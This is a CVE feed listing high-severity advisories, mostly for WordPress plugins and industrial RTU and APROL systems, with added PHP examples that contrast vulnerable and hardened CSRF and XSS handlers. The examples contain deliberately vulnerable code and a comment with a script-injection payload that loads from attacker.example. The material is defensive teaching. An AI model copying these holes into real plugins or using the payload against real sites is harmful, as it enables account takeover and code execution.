CVE-2024-3474 |
Description: The Wow Skype Buttons WordPress plugin before 4.0.4 does not have CSRF checks in some bulk actions, which could allow attackers to make logged-in admins perform unwanted actions, such as deleting buttons, via CSRF attacks.
CVSS: HIGH (8.8) EPSS Score: 0.03% SSVC Exploitation: none
March 25th, 2025 (3 months ago)
|
CVE-2025-1445 |
Description: A vulnerability exists in RTU IEC 61850 client and server functionality that could impact availability if renegotiation of an open IEC 61850 TLS connection takes place in specific timing situations while IEC 61850 communication is active.
The precondition is that IEC 61850 (as client or server) is configured to use TLS on the RTU500 device. It affects the CMU on which the IEC 61850 stack is configured.
CVSS: HIGH (8.7) EPSS Score: 0.05%
March 25th, 2025 (3 months ago)
|
CVE-2024-12169 |
Description: A vulnerability exists in RTU500 IEC 60870-5-104 controlled station functionality and IEC 61850 functionality that allows an attacker performing a specific attack sequence to restart the affected CMU. This vulnerability only applies if secure communication using IEC 62351-3 (TLS) is enabled.
CVSS: HIGH (8.7) EPSS Score: 0.04%
March 25th, 2025 (3 months ago)
|
CVE-2024-57256 |
Description: Nessus Plugin ID 233310 with High Severity
Synopsis
The remote SUSE host is missing one or more security updates.
Description
The remote SUSE Linux SLED15 / SLED_SAP15 / SLES15 / SLES_SAP15 / openSUSE 15 host has packages installed that are affected by multiple vulnerabilities as referenced in the SUSE-SU-2025:0989-1 advisory.
- CVE-2024-57256: integer overflow in U-Boot's ext4 symlink resolution function (bsc#1237284).
- CVE-2024-57258: multiple integer overflows in U-Boot's memory allocator (bsc#1237287).
Tenable has extracted the preceding description block directly from the SUSE security advisory. Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.
Solution
Update the affected packages.
Read more at https://www.tenable.com/plugins/nessus/233310
CVSS: HIGH (7.1)
March 25th, 2025 (3 months ago)
|
CVE-2024-53679 |
Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache VCL in the User Lookup form. A user with sufficient rights to view this part of the site can craft a URL, or be tricked into clicking a URL, that will give a specified user elevated rights.
This issue affects all versions of Apache VCL through 2.5.1.
Users are recommended to upgrade to version 2.5.2, which fixes the issue.
CVSS: HIGH (8.4) EPSS Score: 0.05%
March 25th, 2025 (3 months ago)
|
CVE-2025-2319 |
Description: The EZ SQL Reports Shortcode Widget and DB Backup plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions 4.11.13 to 5.25.08. This is due to missing or incorrect nonce validation on the 'ELISQLREPORTS_menu' function. This makes it possible for unauthenticated attackers to execute code on the server via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link. Version 5.25.10 adds a nonce check, which makes this vulnerability exploitable by admins only.
CVSS: HIGH (8.8) EPSS Score: 0.04%
March 25th, 2025 (3 months ago)
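The two WordPress CSRF entries above (CVE-2024-3474, bulk actions without CSRF checks; CVE-2025-2319, missing or incorrect nonce validation on an admin menu function) share one root cause: an admin-only handler that trusts a POST because the browser sending it holds admin cookies. The following is an added example, not code from either plugin, showing a hypothetical bulk-delete handler in its vulnerable form and with a WordPress nonce check. The function, hook and option names (myplugin_*, 'myplugin_buttons') are assumptions for illustration; wp_nonce_field(), check_admin_referer(), wp_verify_nonce() and current_user_can() are real WordPress core functions.

```php
<?php
// Added example, not the Wow Skype Buttons or EZ SQL Reports plugins' code.
// Hypothetical plugin with a "delete selected buttons" bulk action on its
// admin page. All myplugin_* names and the 'myplugin_buttons' option are assumed.

// VULNERABLE: current_user_can() proves the *browser* belongs to an admin, but a
// form auto-submitted from an attacker's page arrives with the admin's cookies
// and passes the same check. Nothing binds the request to the admin's intent.
// (was hooked as: add_action( 'admin_post_myplugin_bulk_delete', 'myplugin_bulk_delete_vulnerable' );)
function myplugin_bulk_delete_vulnerable() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    $buttons = get_option( 'myplugin_buttons', array() );
    foreach ( (array) ( $_POST['ids'] ?? array() ) as $id ) {
        unset( $buttons[ (int) $id ] );
    }
    update_option( 'myplugin_buttons', $buttons );
    wp_safe_redirect( admin_url( 'admin.php?page=myplugin' ) );
    exit;
}

// "Incorrect" nonce validation looks like this: the verify call is present but
// its return value is discarded, so the handler runs for a forged request too.
//     wp_verify_nonce( $_POST['myplugin_nonce'] ?? '', 'myplugin_bulk_delete' ); // result ignored
//     ... delete anyway ...

// HARDENED: the form carries a nonce bound to this action and to the current
// user; the handler refuses to act unless the nonce verifies.
function myplugin_render_bulk_form( array $buttons ) {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="myplugin_bulk_delete">';
    wp_nonce_field( 'myplugin_bulk_delete', 'myplugin_nonce' ); // adds hidden nonce + referer fields
    foreach ( $buttons as $id => $label ) {
        printf(
            '<label><input type="checkbox" name="ids[]" value="%d"> %s</label><br>',
            (int) $id,
            esc_html( $label )
        );
    }
    echo '<button type="submit">Delete selected</button></form>';
}

function myplugin_bulk_delete_hardened() {
    // Keep the capability check: a nonce proves intent, not authority.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // check_admin_referer() wraps wp_verify_nonce() and dies on failure, so a
    // cross-site POST (which cannot know the per-user nonce) never reaches the
    // delete loop. Core nonces are valid for 12 to 24 hours.
    check_admin_referer( 'myplugin_bulk_delete', 'myplugin_nonce' );

    $ids     = array_map( 'absint', (array) ( $_POST['ids'] ?? array() ) );
    $buttons = get_option( 'myplugin_buttons', array() );
    foreach ( $ids as $id ) {
        unset( $buttons[ $id ] );
    }
    update_option( 'myplugin_buttons', $buttons );
    wp_safe_redirect( admin_url( 'admin.php?page=myplugin' ) );
    exit;
}
add_action( 'admin_post_myplugin_bulk_delete', 'myplugin_bulk_delete_hardened' );
```

The nonce closes the cross-site path only; as the 5.25.10 note above says, the action stays reachable to a logged-in admin who submits the form deliberately. A handler whose effect is "execute code on the server" therefore still deserves review on its own, nonce or not, and the capability check must stay in place because a nonce says nothing about who is allowed to perform the action.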
|
CVE-2024-13690 |
Description: The WP Church Donation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several donation form submission parameters in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVSS: HIGH (7.2) EPSS Score: 0.13%
March 25th, 2025 (3 months ago)
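The entry above (CVE-2024-13690) describes the usual two-part failure behind stored XSS in a WordPress form plugin: donation fields are stored as submitted and later echoed into HTML without escaping, so an unauthenticated submitter gets script executed in whoever views the stored record, typically an admin. The following is an added example, not the WP Church Donation plugin's code; the table name, column names and myplugin_* functions are assumptions, while sanitize_text_field(), sanitize_textarea_field(), sanitize_email(), wp_unslash(), esc_html() and esc_url() are WordPress core functions.

```php
<?php
// Added example, not the WP Church Donation plugin's code. A hypothetical
// donation form whose submissions are stored and listed on an admin page.
// The {$wpdb->prefix}donations table and its columns are assumed.

// VULNERABLE: raw $_POST values are stored, then echoed unescaped into HTML.
// A donor_name of <script src=//attacker.example/x.js></script> runs in the
// browser of every user who opens the donations list.
function myplugin_store_donation_vulnerable() {
    global $wpdb;
    $wpdb->insert( $wpdb->prefix . 'donations', array(
        'donor_name' => $_POST['donor_name'],
        'note'       => $_POST['note'],
        'email'      => $_POST['email'],
    ) );
}
function myplugin_render_donations_vulnerable() {
    global $wpdb;
    $rows = $wpdb->get_results( "SELECT donor_name, note, email FROM {$wpdb->prefix}donations" );
    foreach ( $rows as $r ) {
        echo '<tr><td>' . $r->donor_name . '</td><td>' . $r->note . '</td>'
           . '<td><a href="mailto:' . $r->email . '">' . $r->email . '</a></td></tr>';
    }
}

// HARDENED: sanitize on the way in (strip tags, normalise whitespace) AND,
// independently, escape on the way out with the escaper for the output
// context. Output escaping is the control that holds even if a stored value
// slipped in through another path or an older, unsanitized version.
function myplugin_store_donation_hardened() {
    global $wpdb;
    $wpdb->insert(
        $wpdb->prefix . 'donations',
        array(
            'donor_name' => sanitize_text_field( wp_unslash( $_POST['donor_name'] ?? '' ) ),
            'note'       => sanitize_textarea_field( wp_unslash( $_POST['note'] ?? '' ) ),
            'email'      => sanitize_email( wp_unslash( $_POST['email'] ?? '' ) ),
        ),
        array( '%s', '%s', '%s' ) // format strings keep $wpdb->insert from treating values as raw SQL
    );
}
function myplugin_render_donations_hardened() {
    global $wpdb;
    $rows = $wpdb->get_results( "SELECT donor_name, note, email FROM {$wpdb->prefix}donations" );
    foreach ( $rows as $r ) {
        printf(
            '<tr><td>%s</td><td>%s</td><td><a href="%s">%s</a></td></tr>',
            esc_html( $r->donor_name ),                // HTML text context
            esc_html( $r->note ),                      // HTML text context
            esc_url( 'mailto:' . $r->email ),          // URL/href context
            esc_html( $r->email )
        );
    }
}
```

Two points a reviewer checks here. First, sanitization and escaping are not interchangeable: sanitize_text_field() removes tags but a value such as javascript:alert(1) survives it and is only neutralised by esc_url() at output. Second, the escaper must match the context (esc_html for text nodes, esc_attr for attribute values, esc_url for href/src, wp_json_encode for inline JS); using esc_html inside an href is the kind of "insufficient output escaping" the advisory wording refers to.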
|
CVE-2024-44903 |
Description: SQL Injection can occur in the SirsiDynix Horizon Information Portal (IPAC20) through 3.25_9382; however, a patch is available from the vendor. This is in ipac.jsp in a SELECT WHERE statement, in a part of the uri= variable in the second part of the full= inner variable.
CVSS: HIGH (7.5) EPSS Score: 0.05%
March 25th, 2025 (3 months ago)
|
CVE-2024-10210 |
Description: An External Control of File Name or Path vulnerability in the APROL Web Portal used in B&R APROL <4.4-005P may allow an authenticated network-based attacker to access data from the file system.
CVSS: HIGH (8.4) EPSS Score: 0.05%
March 25th, 2025 (3 months ago)
|
CVE-2024-8313 |
Description: An Exposure of Sensitive System Information to an Unauthorized Control Sphere and Initialization of a Resource with an Insecure Default vulnerability in the SNMP component of B&R APROL <4.4-00P5 may allow an unauthenticated adjacent-based attacker to read and alter configuration using SNMP.
CVSS: HIGH (8.7) EPSS Score: 0.02%
March 25th, 2025 (3 months ago)
|